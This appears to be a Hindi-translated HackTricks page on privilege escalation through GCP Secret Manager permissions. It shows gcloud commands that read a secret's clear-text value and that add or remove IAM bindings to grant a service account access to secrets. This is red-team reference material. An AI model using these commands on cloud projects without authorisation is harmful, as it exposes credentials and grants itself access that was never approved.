GCP - Secretmanager Privesc

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

secretmanager

secretmanager के बारे में अधिक जानकारी के लिए:

GCP - Secrets Manager Enum

secretmanager.versions.access

यह आपको secretmanager से secrets पढ़ने की अनुमति देता है और यह privilege escalation में मदद कर सकता है (यह इस बात पर निर्भर करेगा कि secret के अंदर कौन-सी जानकारी संग्रहीत है):

क्लियर-टेक्स्ट secret version प्राप्त करें ```bash # Get clear-text of version 1 of secret: "" gcloud secrets versions access 1 --secret="" ```

चूँकि यह भी एक पोस्ट-एक्सप्लॉइटेशन तकनीक है, इसे यहाँ पाया जा सकता है:

GCP - Secretmanager Post Exploitation

secretmanager.secrets.setIamPolicy

यह आपको secret manager से secrets पढ़ने की अनुमति देता है, उदाहरण के लिए:

Secret पर IAM policy binding जोड़ें ```bash gcloud secrets add-iam-policy-binding \ --member="serviceAccount:@$PROJECT_ID.iam.gserviceaccount.com" \ --role="roles/secretmanager.secretAccessor" ``` या नीतियों को रद्द करें: ```bash gcloud secrets remove-iam-policy-binding \ --member="serviceAccount:@.iam.gserviceaccount.com" \ --role="roles/secretmanager.secretAccessor" ```

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें